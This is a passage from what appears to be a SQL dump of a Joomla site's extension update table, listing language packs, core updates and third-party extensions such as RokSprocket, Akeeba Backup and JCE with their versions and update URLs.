Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31495,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31496,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31497,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31498,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31499,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31500,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31501,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31502,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31503,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31504,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31505,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31506,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31507,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31508,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31509,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31510,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31511,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31512,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(31513,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(31514,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(31515,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(31516,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(31517,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(31518,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(31519,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(31520,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(31521,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(31522,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(31523,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(31524,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31525,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31526,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31527,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31528,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31529,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31530,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31531,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31532,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31533,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31534,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31535,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31536,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31537,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31538,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31539,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31540,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31541,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31542,57,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31543,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31544,57,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31545,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31546,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31547,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31548,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31549,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31550,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31551,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31552,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31553,57,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31554,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31555,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31556,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31557,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31558,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31559,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31560,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31561,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31562,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31563,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31564,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31565,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31566,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31567,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31568,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31569,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31570,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31571,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31572,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31573,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31574,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31575,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31576,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31577,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31578,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.1','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-1			\n		',''),(31579,129,0,'JCE 2.9.18','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.18','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-18-released',''),(31580,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.7','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(31581,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(31582,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31583,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31584,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31585,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31586,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31587,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31588,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31589,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31590,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31591,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31592,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31593,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31594,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31595,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31596,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31597,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31598,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31599,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31600,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31601,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31602,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31603,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31604,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31605,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31606,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31607,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31608,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31609,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31610,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31611,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31612,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31613,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31614,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31615,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31616,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31617,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31618,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31619,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31620,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31621,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31622,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31623,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31624,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31625,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31626,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31627,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31628,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31629,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31630,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31631,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31632,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31633,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31634,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31635,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31636,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31637,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31638,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31639,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31640,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31641,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31642,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31643,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31644,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31645,3,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31646,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31647,3,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31648,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31649,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31650,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31651,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31652,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31653,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31654,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31655,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31656,3,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31657,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31658,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31659,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31660,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31661,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31662,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31663,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31664,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31665,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31666,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31667,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31668,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31669,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31670,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31671,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31672,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31673,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31674,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31675,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31676,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31677,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31678,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31679,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31680,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(31681,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(31682,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(31683,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(31684,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(31685,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(31686,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(31687,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(31688,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(31689,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(31690,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(31691,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(31692,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31693,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31694,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31695,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31696,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31697,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31698,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31699,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31700,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31701,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31702,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31703,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31704,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31705,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31706,57,0,'English, 